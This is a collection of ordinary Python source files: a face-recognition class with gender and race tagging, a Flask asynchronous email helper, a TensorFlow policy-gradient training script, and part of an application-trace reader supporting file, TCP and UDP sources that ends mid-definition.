def __init__(self, known_faces_encodes_npy_file_path, known_faces_ids_npy_file_path, face_tag_model_path=None):
'''
parameters:
known_faces_encodes_npy_file_path : path to the numpy file which contains saved faces encodes
known_faces_ids_npy_file_path : path to the numpy file which contains corresponding faces encodes ids.
face_tag_model_path : path of pickled MLP model to predict face gender and race from predicted face encodings
'''
self.known_faces_encodes_npy_file_path = known_faces_encodes_npy_file_path
self.known_faces_ids_npy_file_path = known_faces_ids_npy_file_path
        self.load_known_faces_encodes_ids() # load the previously recognized faces if they exist.
if face_tag_model_path !=None:
self.faceTagModel, self.faceTagsLabels = self.load_faceTag_model(face_tag_model_path)
def load_known_faces_encodes_ids(self):
'''
        load previously saved face encoding vectors and their corresponding ids from numpy files into
        **known_face_encodings** (a list of numpy vectors holding the face encodings) and **known_face_ids** (the corresponding ids in list format),
        and compute **max_id**, which is used to append new encodings with a new id.
'''
self.known_face_encodings =[]
self.known_face_ids = []
self.max_id = -1
try:
self.known_face_encodings = np.load(self.known_faces_encodes_npy_file_path).tolist()
self.known_face_ids = np.load(self.known_faces_ids_npy_file_path).tolist()
self.max_id = max(self.known_face_ids)
print("\n\n\n\ \t\t\t\t\t#### loaded ##### \n")
print("\n[INFO] known_face_ids loaded : ", self.known_face_ids)
print("\n[INFO] max id loaded : ", self.max_id)
print("\t\t\t###############################\n\n")
except Exception as e:
print("\n\n\n\t\t\t\t #### WARNING ##### \n\n no saved file for known faces")
os.system("touch "+self.known_faces_encodes_npy_file_path)
os.system("touch "+self.known_faces_ids_npy_file_path)
print(e)
def save_faces_encodings_with_ids(self):
'''
        save the face encodings numpy list with the corresponding ids
'''
known_faces_encodes_np = np.array(self.known_face_encodings)
known_faces_id_np = np.array(self.known_face_ids)
try:
np.save(self.known_faces_encodes_npy_file_path, known_faces_encodes_np)
np.save(self.known_faces_ids_npy_file_path, known_faces_id_np)
except Exception as e:
print('\n\n save_faces_encodings_with_ids function in recognition cannot save ,\n', e)
def add_new_face_encodes(self, face_encoding, save_refresh_rate=5):
'''
        add a new face encoding and id to the known face encodings and ids.
        the new id is added as (the last id added / max_id) + 1
        and max_id is updated as max_id = max_id + 1
        parameters:
            face_encoding : new face encoding to append to the known face encodings.
            save_refresh_rate : save the known faces and their ids to the filesystem every save_refresh_rate new faces
'''
self.known_face_encodings.append(face_encoding)
        if len(self.known_face_ids)==0: # if no ids have been added yet, add 0 as the first id
self.known_face_ids.append(0)
face_id = 0
self.max_id=0
else:
face_id = self.max_id+1
self.max_id +=1
self.known_face_ids.append(face_id)
# update and save known faces every (save_refresh_rate) new faces
if self.max_id%save_refresh_rate==0:
save_process = multiprocessing.Process(target=self.save_faces_encodings_with_ids)
save_process.start()
return face_id
def recognize(self, frame, faces_bounding_boxes, recognition_threshold_distance = 0.4, save_rate=1, with_gender_race=True):
'''
        try to recognize the faces in the given frame
parameters:
frame : opencv/numpy rgb frame/image
faces_bounding_boxes : detected faces bounding boxes in format (x1, y1, x2, y2)/(left, top, right, bottom)
where (x1, y1) is the upper left corner of the box,(x2, y2) is the lower right corner of the box.
            recognition_threshold_distance : two faces are considered a match if the distance between them is less than or equal to this threshold
            save_rate : the number of new face encodings after which the known faces are saved to disk
            with_gender_race : boolean flag to feed the face encodings to the face tags MLP to predict the gender and race of each face
returns:
            detected_faces_ids : list containing the recognized face ids
            (also returned: raw_landmarks, face_encodings, genders_list, races_list)
'''
detected_faces_ids = []
if len(faces_bounding_boxes)> 0:
face_locations = [(top, right, bottom, left) for [left, top, right, bottom] in faces_bounding_boxes]
            # get a list containing a 128-d encoding for each face found in the given frame
face_encodings, raw_landmarks = face_recognition.face_encodings(frame, face_locations)
# if settings.Debug:
# print("\nfaceencodes and land marks\n", (face_encodings, raw_landmarks))
# get face tags
if with_gender_race:
faces_tags = self.faceTagModel.predict_proba(face_encodings)
else:
faces_tags= [None for _ in range(len(face_encodings))]
# if settings.Debug:
# print("\nface tags\n", faces_tags)
            # containers for the results of trying to recognize each face
            # loop over each face encoding found
genders_list, races_list = [],[]
for face_encoding, tag in zip(face_encodings, faces_tags):
#get tags
try:
gender, race = self.get_tags(tag)
genders_list.append(gender)
races_list.append(race)
except:
pass
# See if the face is matching any of known face(s)
# use the known face with the smallest distance to the new face
if len(self.known_face_encodings)==0:
face_id = self.add_new_face_encodes(face_encoding, save_refresh_rate=save_rate)
else:
face_distances = face_recognition.face_distance(self.known_face_encodings, face_encoding)
best_match_index, min_distance = None, None
                    if len(face_distances) > 0: # only if there is at least one known face
best_match_index = np.argmin(face_distances)
min_distance = np.min(face_distances)
                        # check if the best match is less than or equal to the given threshold
if min_distance <= recognition_threshold_distance:
                            # get the corresponding id of the matched face
face_id = self.known_face_ids[best_match_index]
                            # if the distance is close to the threshold,
                            # also add this face encoding to avoid misrecognising the face later
if(recognition_threshold_distance-min_distance <= recognition_threshold_distance/2.0):
self.known_face_encodings.append(face_encoding)
self.known_face_ids.append(face_id)
else:
                            # if the distance is greater than the given threshold
face_id = self.add_new_face_encodes(face_encoding, save_refresh_rate=save_rate)
if face_id!=None:
detected_faces_ids.append(face_id)
return detected_faces_ids, raw_landmarks, face_encodings, genders_list, races_list
def get_tags(self,face_tags_probs):
'''
        get gender and race based on the predicted probabilities of the MLP tags model
        parameters :
            face_tags_probs : (numpy array) contains the prediction probabilities
returns :
gender, race
'''
gender = "Male" if face_tags_probs[0]>=0.5 else "Female"
race = self.faceTagsLabels[1:4][np.argmax(face_tags_probs[1:4])]
return gender, race
def load_faceTag_model(self, face_tag_model_path):
"""
        load the pickled face tags model
        parameters:
face_tag_model_path : (string) contains the path of pickled model
returns:
clf : MLP model
labels: 70 labels the model can predict
"""
with open(face_tag_model_path, 'rb') as f:
clf, labels = pickle.load(f, encoding='latin1')
return clf, labels
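# --- Illustrative usage sketch (added, not part of the original module) ---
# The file paths, image and bounding box below are assumptions; a real pipeline would
# obtain the bounding boxes from a face detector and pass an RGB frame.
def _example_recognize_single_frame():
    '''minimal sketch: recognize faces in one RGB frame without the gender/race MLP'''
    recognizer = Recognizer("known_encodes.npy", "known_ids.npy")   # hypothetical paths
    bgr = cv2.imread("person.jpg")                                  # hypothetical image
    rgb = cv2.cvtColor(bgr, cv2.COLOR_BGR2RGB)
    boxes = [(10, 10, 110, 110)]  # (left, top, right, bottom) from some detector
    ids, landmarks, encodings, genders, races = recognizer.recognize(
        rgb, boxes, with_gender_race=False)
    print("recognized ids:", ids)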
|
email.py
|
from . import mail
from flask_mail import Message
from flask import current_app, render_template
from threading import Thread
"""La funzione mail.send() blocca l’applicazione durante l’operazione di spedizione.
Per questo l’operazione stessa viene delegata ad un thread che lavora in background,
evitando che il browser e tutta l’applicazione rimangano in attesa."""
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(subject, sender=app.config["MAIL_USERNAME"], recipients=[to])
    # Either msg.html or msg.body is sent; they carry the same content
msg.body = render_template(template + ".txt", **kwargs)
msg.html = render_template(template + ".html", **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
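# Illustrative usage sketch (added, not part of the original module): sending a
# confirmation mail from inside a Flask request context. The recipient, subject and
# template name are assumptions; templates/mail/confirm.txt and .html are expected to exist.
def _example_send_confirmation(user):
    thr = send_email(user.email, "Confirm your account", "mail/confirm", user=user)
    # the returned thread can be joined in tests to wait until delivery has finished
    return thr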
|
train_pg_v2.py
|
import numpy as np
import tensorflow as tf
import gym
import logz
import scipy.signal
import os
import time
from multiprocessing import Process
import shutil
class MyArgument(object):
def __init__(self,
exp_name='vpg',
env_name='CartPole-v1',
n_iter=100,
gamma=.99,
min_batch_size=1000,
max_path_length=None,
learning_rate=1e-3,
reward_to_go=True,
render=False,
normalize_advantage=True,
nn_baseline=True,
seed=1,
n_layers=1,
size=32,
debug=False,
max_loss=100):
self.exp_name = exp_name
self.env_name = env_name
self.n_iter = n_iter
self.gamma = gamma
self.min_batch_size = min_batch_size
self.max_path_length = max_path_length
self.learning_rate = learning_rate
self.reward_to_go = reward_to_go
self.render = render
self.debug = debug
self.max_loss = max_loss
self.normalize_advantage = normalize_advantage
self.nn_baseline = nn_baseline
self.seed = seed
self.n_layers = n_layers
self.size = size
base_dir = '/tmp/pg/%s' % self.env_name
self.log_dir = 'bl_' if self.nn_baseline else ''
self.log_dir += 'rtg_' if self.reward_to_go else ''
self.log_dir += 'norm_' if self.normalize_advantage else ''
self.log_dir += 'nn_%d_%d_' % (self.n_layers, self.size)
self.log_dir += 'lr_%6f_' % self.learning_rate
self.log_dir += 'batch_%d_' % self.min_batch_size
self.log_dir += 't_%d' % self.max_loss
self.log_dir = os.path.join(base_dir, self.log_dir)
self.log_dir = os.path.join(self.log_dir, 'seed%d' % self.seed)
class PgModel(object):
def __init__(self, env, n_layers, size, learning_rate, nn_baseline, debug):
self.observation_dim = env.observation_space.shape[0]
self.ph_observation = tf.placeholder(shape=[None, self.observation_dim], name="Observation", dtype=tf.float32)
self.ph_advance = tf.placeholder(shape=[None], name='advance', dtype=tf.float32)
self.nn_baseline = nn_baseline
self.ph_q_value = tf.placeholder(shape=[None], name='QValue', dtype=tf.float32)
self.debug = debug
if self.debug:
self.ph_mean_reward = tf.placeholder(name="reward", dtype=tf.float32)
tf.summary.scalar("MeanReward", self.ph_mean_reward)
self.predict_action = None
self.critic_opt = None
        self.action_opt = None
self.ph_action = None
self.predict_baseline = None
self.merged = None
self.critic_loss = None
@staticmethod
def build_mlp(input_placeholder, output_size, scope,
n_layers=2, size=64, activation=tf.nn.relu, output_activation=None):
with tf.variable_scope(scope):
x = tf.keras.Input(tensor=input_placeholder)
for i in range(n_layers):
x = tf.keras.layers.Dense(units=size, activation=activation)(x)
x = tf.keras.layers.Dense(units=output_size, activation=output_activation)(x)
return x
def get_predict_action(self, sess, observation):
action = sess.run(self.predict_action, feed_dict={self.ph_observation: observation[None]})
return action[0]
def update(self, sess, observations, actions, q, normalize_advance, mean_reward, max_loss):
if self.nn_baseline:
            # Update Critic Network
baseline = sess.run(self.predict_baseline, feed_dict={self.ph_observation: observations})
updated_baseline = baseline * .9 + q * .1
sess.run([self.critic_opt], feed_dict={self.ph_observation: observations,
self.ph_q_value: updated_baseline})
advance = q - baseline
else:
advance = q.copy()
if normalize_advance:
advance = (advance - np.mean(advance)) / (np.std(advance) + 1e-8)
# Update the Actor network
if self.debug:
_, summary = sess.run([self.action_opt, self.merged], feed_dict={self.ph_observation: observations,
self.ph_action: actions,
self.ph_advance: advance,
self.ph_q_value: q,
self.ph_mean_reward: mean_reward})
else:
sess.run(self.action_opt, feed_dict={self.ph_observation: observations,
self.ph_action: actions,
self.ph_advance: advance})
summary = None
return summary
class PgModelContinuous(PgModel):
def __init__(self, env, n_layers, size, learning_rate, nn_baseline, debug):
super().__init__(env, n_layers, size, learning_rate, nn_baseline, debug)
self.action_dim = env.action_space.shape[0]
self.ph_action = tf.placeholder(shape=[None, self.action_dim], name="Action", dtype=tf.float32)
# Define the Actor Model
with tf.variable_scope("Actor"):
# N x action dim
# Output activation ?
self.action_mean = self.build_mlp(input_placeholder=self.ph_observation,
output_size=self.action_dim,
scope="Mean_%d_%d" % (n_layers, size),
size=size,
n_layers=n_layers,
activation=tf.nn.relu,
output_activation=None)
# action dim
# self.action_sigma = tf.get_variable(name='Sigma', shape=[self.action_dim],
# dtype=tf.float32, trainable=True, initializer=tf.ones_initializer())
self.action_sigma = self.build_mlp(input_placeholder=self.ph_observation,
output_size=self.action_dim,
scope="Sigma_%d_%d" % (n_layers, size),
size=32,
n_layers=1,
activation=tf.nn.relu,
output_activation=tf.nn.sigmoid)
tf.summary.histogram('Mean', self.action_mean)
tf.summary.histogram('Std', self.action_sigma)
# Broadcast expected here
# Get N x action dim distributions
self.normal_dist = tf.distributions.Normal(self.action_mean, (self.action_sigma + 1e-8),
name="PredictDistribution")
        # Expected N x action_dim distributions
self.predict_action = self.normal_dist.sample(name="PredictAction")
# self.predict_action = tf.clip_by_value(normal_dist.sample(), env.action_space.low, env.action_space.high,
# name="PredictAction")
with tf.name_scope("Loss"):
self.action_prob = self.normal_dist.log_prob(self.ph_action, name="Prob")
self.actor_loss = - tf.reduce_mean(self.action_prob * tf.expand_dims(self.ph_advance, -1))
tf.summary.scalar('Actor Loss', self.actor_loss)
with tf.name_scope("Opt/"):
self.action_opt = tf.train.AdamOptimizer(learning_rate).minimize(self.actor_loss)
# Define the Critic Model
if nn_baseline:
with tf.name_scope("Critic"):
self.predict_baseline_2d = self.build_mlp(input_placeholder=self.ph_observation,
output_size=1,
scope="NN_%d_%d" % (n_layers, size),
n_layers=n_layers,
size=size,
activation=tf.nn.relu)
self.predict_baseline = tf.squeeze(self.predict_baseline_2d, axis=1, name="PredictBaseline")
with tf.name_scope("Loss"):
self.critic_loss = tf.losses.mean_squared_error(self.ph_q_value, self.predict_baseline)
tf.summary.scalar('Critic Loss', self.critic_loss)
with tf.name_scope("Opt/"):
self.critic_opt = tf.train.AdamOptimizer(learning_rate).minimize(self.critic_loss)
weights = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
for w in weights:
tf.summary.histogram(w.name, w)
self.merged = tf.summary.merge_all()
class PgModelDiscrete(PgModel):
def __init__(self, env, n_layers, size, learning_rate, nn_baseline, debug):
super().__init__(env, n_layers, size, learning_rate, nn_baseline, debug)
self.action_dim = env.action_space.n
self.ph_action = tf.placeholder(shape=[None], name="Action", dtype=tf.int32)
# Define the Actor Model
with tf.name_scope("Actor"):
self.action_logist = self.build_mlp(input_placeholder=self.ph_observation,
output_size=self.action_dim, scope="NN_%d_%d" % (n_layers, size),
size=size, n_layers=n_layers)
self.predict_action_2d = tf.multinomial(self.action_logist, 1)
self.predict_action = tf.squeeze(self.predict_action_2d, axis=1, name="PredictAction")
self.batch_size = tf.shape(self.ph_observation)[0]
with tf.name_scope('Loss'):
indices = tf.stack([tf.range(self.batch_size), self.ph_action], axis=1)
action_prob = tf.gather_nd(tf.nn.softmax(self.action_logist), indices)
self.actor_loss = tf.reduce_mean(-tf.log(action_prob) * self.ph_advance)
tf.summary.scalar('Actor loss', self.actor_loss)
with tf.name_scope("Opt/"):
self.action_opt = tf.train.AdamOptimizer(learning_rate).minimize(self.actor_loss)
# Define the Critic Model
if nn_baseline:
with tf.name_scope("Critic"):
self.predict_baseline_2d = self.build_mlp(input_placeholder=self.ph_observation,
output_size=1,
scope="NN_%d_%d" % (n_layers, size),
n_layers=n_layers,
size=size,
activation=tf.nn.relu)
self.predict_baseline = tf.squeeze(self.predict_baseline_2d, axis=1, name="PredictBaseline")
with tf.name_scope("Loss"):
self.critic_loss = tf.losses.mean_squared_error(self.ph_q_value, self.predict_baseline)
tf.summary.scalar('Critic Loss', self.critic_loss)
with tf.name_scope("Opt/"):
self.critic_opt = tf.train.AdamOptimizer(learning_rate).minimize(self.critic_loss)
weights = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
for w in weights:
tf.summary.histogram(w.name, w)
self.merged = tf.summary.merge_all()
def discount_reward(paths, gamma, reward_to_go):
if reward_to_go:
discounted_reward = []
for path in paths:
path_len = len(path['reward'])
discount_factor = [1 * (gamma ** i) for i in range(path_len)]
for i in range(path_len):
discounted_reward.append(
np.sum(np.array(path['reward'][i:]) * np.array(discount_factor[:path_len - i])))
else:
discounted_reward = []
for path in paths:
ret_tau = 0
discount_factor = 1
for reward in path['reward']:
ret_tau += reward * discount_factor
discount_factor *= gamma
discounted_reward.extend([ret_tau for i in range(len(path['reward']))])
q_n = np.array(discounted_reward, dtype=np.float32)
return q_n
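# Worked example (added for illustration, not part of the original script): for a single
# path with rewards [1, 1, 1] and gamma = 0.5, reward-to-go yields per-step returns
# [1.75, 1.5, 1.0], while the full-trajectory variant repeats the total 1.75 at every step.
def _discount_reward_example():
    paths = [{'reward': [1.0, 1.0, 1.0]}]
    q_rtg = discount_reward(paths, gamma=0.5, reward_to_go=True)    # -> [1.75, 1.5, 1.0]
    q_full = discount_reward(paths, gamma=0.5, reward_to_go=False)  # -> [1.75, 1.75, 1.75]
    return q_rtg, q_full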
def verify_model(sess, model, env):
action_dim = env.action_space.shape[0]
observation_dim = env.observation_space.shape[0]
observations = np.random.randn(observation_dim)
print("Observation shape:", observations.shape)
print(observations)
actions = model.get_predict_action(sess, observations)
print("action shape:", actions.shape)
print(actions)
assert actions.shape == (action_dim,)
N = 10
observations = np.random.randn(N, observation_dim)
print("Observation shape:", observations.shape)
print(observations)
predict_action = sess.run(model.predict_action, feed_dict={model.ph_observation: observations})
print("Action shape:", predict_action.shape)
print(predict_action)
assert predict_action.shape == (N, action_dim)
action_prob = sess.run(model.action_prob, feed_dict={model.ph_observation: observations,
model.ph_action: predict_action})
print("Prob:", action_prob)
assert action_prob.shape == (N, action_dim)
loss = sess.run(model.actor_loss, feed_dict={model.ph_observation: observations,
model.ph_action: predict_action,
model.ph_advance: np.ones(N)})
print("Loss:", loss)
for i in range(20):
sess.run(model.action_opt, feed_dict={model.ph_observation: observations,
model.ph_action: predict_action,
model.ph_advance: np.ones(N)})
action_prob2 = sess.run(model.action_prob, feed_dict={model.ph_observation: observations,
model.ph_action: predict_action})
print("Prob2:", action_prob2)
assert action_prob2.shape == (N, action_dim)
loss2 = sess.run(model.actor_loss, feed_dict={model.ph_observation: observations,
model.ph_action: predict_action,
model.ph_advance: np.ones(N)})
print("Loss2:", loss2)
assert loss2 < loss
print(np.sum(action_prob2 > action_prob))
assert np.sum(action_prob2 > action_prob) == N * action_dim
def train_pg(args):
if os.path.exists(args.log_dir):
shutil.rmtree(args.log_dir)
logz.configure_output_dir(args.log_dir)
logz.save_params(args.__dict__)
# Set random seeds
tf.set_random_seed(args.seed)
np.random.seed(args.seed)
# Make the gym environment
env = gym.make(args.env_name)
# Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
if discrete:
model = PgModelDiscrete(env, args.n_layers, args.size, args.learning_rate, args.nn_baseline, debug=args.debug)
else:
model = PgModelContinuous(env, args.n_layers, args.size, args.learning_rate, args.nn_baseline, debug=args.debug)
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
sess = tf.Session(config=tf_config)
sess.__enter__() # equivalent to `with sess:`
tf.global_variables_initializer().run() # pylint: disable=E1101
writer = tf.summary.FileWriter(args.log_dir, sess.graph)
# if not discrete:
# verify_model(sess, model, env)
max_path_length = args.max_path_length or env.spec.max_episode_steps
start = time.time()
for itr in range(args.n_iter):
end = time.time()
cost = end - start
start = end
if itr > 0:
if itr == 1:
mean_cost = cost
else:
mean_cost = .9 * mean_cost + .1 * cost
print("Time: %1f " % mean_cost, "Togo:%1f min" % ((args.n_iter - itr) * mean_cost / 60))
print("********** Iteration %i ************" % itr)
time_steps_this_batch = 0
paths = []
while True:
observation = env.reset()
obs, acs, rewards = [], [], []
render_this_episode = (len(paths) == 0 and (itr % 10 == 0) and args.render)
path_steps = 0
while True:
if render_this_episode:
env.render()
time.sleep(0.0001)
obs.append(observation)
action = model.get_predict_action(sess, observation)
acs.append(action)
observation, rew, done, _ = env.step(action)
rewards.append(rew)
path_steps += 1
if done or path_steps > max_path_length:
break
path = {"observation": np.array(obs),
"reward": np.array(rewards),
"action": np.array(acs)}
paths.append(path)
time_steps_this_batch += len(obs)
if time_steps_this_batch > args.min_batch_size:
break
path_reward = [sum(path['reward']) for path in paths]
mean_reward = sum(path_reward) / len(path_reward)
print("Average Reward:", mean_reward)
ob_batch = np.concatenate([path["observation"] for path in paths])
ac_batch = np.concatenate([path["action"] for path in paths])
q_batch = discount_reward(paths, args.gamma, args.reward_to_go)
summary = model.update(sess, observations=ob_batch, actions=ac_batch,
q=q_batch, normalize_advance=args.normalize_advantage,
mean_reward=mean_reward, max_loss=args.max_loss)
if args.debug:
writer.add_summary(summary, itr)
logz.pickle_tf_vars()
def main():
for baseline in [True]:
for normalize in [True]:
for reward_to_go in [True]:
for min_batch in [10000]:
for lr in [1e-2]:
for max_loss in [1e6]:
for seed in [23]:
# env_name = 'CartPole-v0'
# env_name = 'MountainCar-v0'
# env_name = 'MountainCarContinuous-v0'
env_name = 'InvertedPendulum-v1'
# env_name = "Ant-v1"
env_name = 'HalfCheetah-v1'
args = MyArgument(env_name=env_name,
seed=seed,
debug=True,
n_layers=3,
size=64,
reward_to_go=reward_to_go,
normalize_advantage=normalize,
nn_baseline=baseline,
n_iter=1200,
learning_rate=lr,
render=False,
max_path_length=500,
min_batch_size=min_batch,
max_loss=max_loss)
p = Process(target=train_pg, args=(args,))
p.start()
p.join()
if __name__ == "__main__":
main()
|
apptrace.py
|
import os
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
import SocketServer
except ImportError:
import socketserver as SocketServer
import threading
import tempfile
import time
import subprocess
import os.path
import elftools.elf.elffile as elffile
import elftools.elf.constants as elfconst
def addr2line(toolchain, elf_path, addr):
"""
    Converts an address to a source code location using the toolchain's addr2line utility.
Parameters
----------
toolchain : string
toolchain prefix to retrieve source line locations using addresses
elf_path : string
path to ELF file to use
addr : int
address to retrieve source line location
Returns
-------
string
source line location string
"""
try:
return subprocess.check_output(['%saddr2line' % toolchain, '-e', elf_path, '0x%x' % addr]).decode("utf-8")
except subprocess.CalledProcessError:
return ''
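# Illustrative sketch (added, not part of the original module): resolving a single address.
# The toolchain prefix, ELF path and address are assumptions for demonstration only.
def _example_addr2line():
    loc = addr2line('xtensa-esp32-elf-', 'build/app.elf', 0x400d1234)
    print(loc if loc else 'address could not be resolved')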
class ParseError(RuntimeError):
"""
Parse error exception
"""
def __init__(self, message):
RuntimeError.__init__(self, message)
class ReaderError(RuntimeError):
"""
Trace reader error exception
"""
def __init__(self, message):
RuntimeError.__init__(self, message)
class ReaderTimeoutError(ReaderError):
"""
Trace reader timeout error
"""
def __init__(self, tmo, sz):
ReaderError.__init__(self, 'Timeout %f sec while reading %d bytes!' % (tmo, sz))
class ReaderShutdownRequest(ReaderError):
"""
Trace reader shutdown request error
Raised when user presses CTRL+C (SIGINT).
"""
def __init__(self):
ReaderError.__init__(self, 'Shutdown request!')
class Reader:
"""
Base abstract reader class
"""
def __init__(self, tmo):
"""
Constructor
Parameters
----------
tmo : int
read timeout
"""
self.timeout = tmo
self.need_stop = False
def read(self, sz):
"""
Reads a number of bytes
Parameters
----------
sz : int
number of bytes to read
Returns
-------
bytes object
read bytes
        Raises
        ------
ReaderTimeoutError
if timeout expires
ReaderShutdownRequest
if SIGINT was received during reading
"""
pass
def readline(self):
"""
Reads line
Returns
-------
string
read line
"""
pass
def forward(self, sz):
"""
        Moves the read pointer forward by a number of bytes
        Parameters
        ----------
        sz : int
            number of bytes to skip
"""
pass
def cleanup(self):
"""
Cleans up reader
"""
self.need_stop = True
class FileReader(Reader):
"""
File reader class
"""
def __init__(self, path, tmo):
"""
Constructor
Parameters
----------
path : string
path to file to read
tmo : int
see Reader.__init__()
"""
Reader.__init__(self, tmo)
self.trace_file_path = path
self.trace_file = open(path, 'rb')
def read(self, sz):
"""
see Reader.read()
"""
data = b''
start_tm = time.clock()
while not self.need_stop:
data += self.trace_file.read(sz - len(data))
if len(data) == sz:
break
if self.timeout != -1 and time.clock() >= start_tm + self.timeout:
raise ReaderTimeoutError(self.timeout, sz)
if self.need_stop:
raise ReaderShutdownRequest()
return data
def get_pos(self):
"""
Retrieves current file read position
Returns
-------
int
read position
"""
return self.trace_file.tell()
def readline(self, linesep=os.linesep):
"""
        see Reader.readline()
"""
line = ''
start_tm = time.clock()
while not self.need_stop:
line += self.trace_file.readline().decode("utf-8")
if line.endswith(linesep):
break
if self.timeout != -1 and time.clock() >= start_tm + self.timeout:
raise ReaderTimeoutError(self.timeout, 1)
if self.need_stop:
raise ReaderShutdownRequest()
return line
def forward(self, sz):
"""
        see Reader.forward()
"""
cur_pos = self.trace_file.tell()
start_tm = time.clock()
while not self.need_stop:
file_sz = os.path.getsize(self.trace_file_path)
if file_sz - cur_pos >= sz:
break
if self.timeout != -1 and time.clock() >= start_tm + self.timeout:
raise ReaderTimeoutError(self.timeout, sz)
if self.need_stop:
raise ReaderShutdownRequest()
self.trace_file.seek(sz, os.SEEK_CUR)
class NetRequestHandler:
"""
Handler for incoming network requests (connections, datagrams)
"""
def handle(self):
while not self.server.need_stop:
data = self.rfile.read(1024)
if len(data) == 0:
break
self.server.wtrace.write(data)
self.server.wtrace.flush()
class NetReader(FileReader):
"""
    Base network socket reader class
"""
def __init__(self, tmo):
"""
see Reader.__init__()
"""
fhnd,fname = tempfile.mkstemp()
FileReader.__init__(self, fname, tmo)
self.wtrace = os.fdopen(fhnd, 'wb')
self.server_thread = threading.Thread(target=self.serve_forever)
self.server_thread.start()
def cleanup(self):
"""
see Reader.cleanup()
"""
FileReader.cleanup(self)
self.shutdown()
self.server_close()
self.server_thread.join()
time.sleep(0.1)
self.trace_file.close()
self.wtrace.close()
class TCPRequestHandler(NetRequestHandler, SocketServer.StreamRequestHandler):
"""
Handler for incoming TCP connections
"""
pass
class TCPReader(NetReader, SocketServer.TCPServer):
"""
TCP socket reader class
"""
def __init__(self, host, port, tmo):
"""
Constructor
Parameters
----------
host : string
see SocketServer.BaseServer.__init__()
port : int
see SocketServer.BaseServer.__init__()
tmo : int
see Reader.__init__()
"""
SocketServer.TCPServer.__init__(self, (host, port), TCPRequestHandler)
NetReader.__init__(self, tmo)
class UDPRequestHandler(NetRequestHandler, SocketServer.DatagramRequestHandler):
"""
Handler for incoming UDP datagrams
"""
pass
class UDPReader(NetReader, SocketServer.UDPServer):
"""
UDP socket reader class
"""
def __init__(self, host, port, tmo):
"""
Constructor
Parameters
----------
host : string
see SocketServer.BaseServer.__init__()
port : int
see SocketServer.BaseServer.__init__()
tmo : int
see Reader.__init__()
"""
SocketServer.UDPServer.__init__(self, (host, port), UDPRequestHandler)
NetReader.__init__(self, tmo)
def reader_create(trc_src, tmo):
"""
Creates trace reader.
Parameters
----------
trc_src : string
trace source URL. Supports 'file:///path/to/file' or (tcp|udp)://host:port
tmo : int
read timeout
Returns
-------
Reader
reader object or None if URL scheme is not supported
"""
url = urlparse(trc_src)
if len(url.scheme) == 0 or url.scheme == 'file':
if os.name == 'nt':
# workaround for Windows path
return FileReader(trc_src[7:], tmo)
else:
return FileReader(url.path, tmo)
if url.scheme == 'tcp':
return TCPReader(url.hostname, url.port, tmo)
if url.scheme == 'udp':
return UDPReader(url.hostname, url.port, tmo)
return None
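# Illustrative sketch (added, not part of the original module): creating a reader from a
# URL and pulling raw trace data from it. The trace file path is an assumption.
def _example_reader_create():
    reader = reader_create('file:///tmp/apptrace.log', -1)  # -1: block until data arrives
    try:
        header = reader.read(4)    # read 4 raw bytes
        line = reader.readline()   # or read a text line
        print(header, line)
    finally:
        reader.cleanup()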
class TraceDataProcessor:
"""
Base abstract class for all trace data processors.
"""
def __init__(self, print_events, keep_all_events=False):
"""
Constructor.
Parameters
----------
print_events : bool
if True every event will be printed as they arrive
keep_all_events : bool
if True all events will be kept in self.events in the order they arrive
"""
self.print_events = print_events
self.keep_all_events = keep_all_events
self.total_events = 0
self.events = []
        # This can be changed by the root processor that includes several sub-processors.
        # It is used to access methods of the root processor, which can contain methods/data common to all sub-processors.
# Common info could be current execution context, info about running tasks, available IRQs etc.
self.root_proc = self
def _print_event(self, event):
"""
Base method to print an event.
Parameters
----------
event : object
Event object
"""
print("EVENT[{:d}]: {}".format(self.total_events, event))
def print_report(self):
"""
Base method to print report.
"""
print("Processed {:d} events".format(self.total_events))
def cleanup(self):
"""
Base method to make cleanups.
"""
pass
def on_new_event(self, event):
"""
Base method to process event.
"""
if self.print_events:
self._print_event(event)
if self.keep_all_events:
self.events.append(event)
self.total_events += 1
class LogTraceParseError(ParseError):
"""
Log trace parse error exception.
"""
pass
def get_str_from_elf(felf, str_addr):
"""
Retrieves string from ELF file.
Parameters
----------
felf : elffile.ELFFile
        open ELF file handle to retrieve the string from
str_addr : int
address of the string
Returns
-------
string
string or None if it was not found
"""
tgt_str = ''
for sect in felf.iter_sections():
if sect['sh_addr'] == 0 or (sect['sh_flags'] & elfconst.SH_FLAGS.SHF_ALLOC) == 0:
continue
if str_addr < sect['sh_addr'] or str_addr >= sect['sh_addr'] + sect['sh_size']:
continue
sec_data = sect.data()
for i in range(str_addr - sect['sh_addr'], sect['sh_size']):
if type(sec_data) is str:
ch = sec_data[i]
else:
ch = str(chr(sec_data[i]))
if ch == '\0':
break
tgt_str += ch
if len(tgt_str) > 0:
return tgt_str
return None
class LogTraceEvent:
"""
Log trace event.
"""
def __init__(self, fmt_addr, log_args):
"""
Constructor.
Parameters
----------
fmt_addr : int
address of the format string
log_args : list
list of log message arguments
"""
self.fmt_addr = fmt_addr
self.args = log_args
def get_message(self, felf):
"""
Retrieves log message.
Parameters
----------
felf : elffile.ELFFile
            open ELF file handle to retrieve the format string from
Returns
-------
string
formatted log message
Raises
------
LogTraceParseError
if format string has not been found in ELF file
"""
fmt_str = get_str_from_elf(felf, self.fmt_addr)
if not fmt_str:
raise LogTraceParseError('Failed to find format string for 0x%x' % self.fmt_addr)
prcnt_idx = 0
for i, arg in enumerate(self.args):
prcnt_idx = fmt_str.find('%', prcnt_idx, -2) # TODO: check str ending with %
if prcnt_idx == -1:
break
prcnt_idx += 1 # goto next char
if fmt_str[prcnt_idx] == 's':
# find string
arg_str = get_str_from_elf(felf, self.args[i])
if arg_str:
self.args[i] = arg_str
else:
self.args[i] = '<None>'
fmt_str = fmt_str.replace('%p', '%x')
return fmt_str % tuple(self.args)
class BaseLogTraceDataProcessorImpl:
"""
Base implementation for log data processors.
"""
def __init__(self, print_log_events=False, elf_path=''):
"""
Constructor.
Parameters
----------
print_log_events : bool
if True every log event will be printed as they arrive
elf_path : string
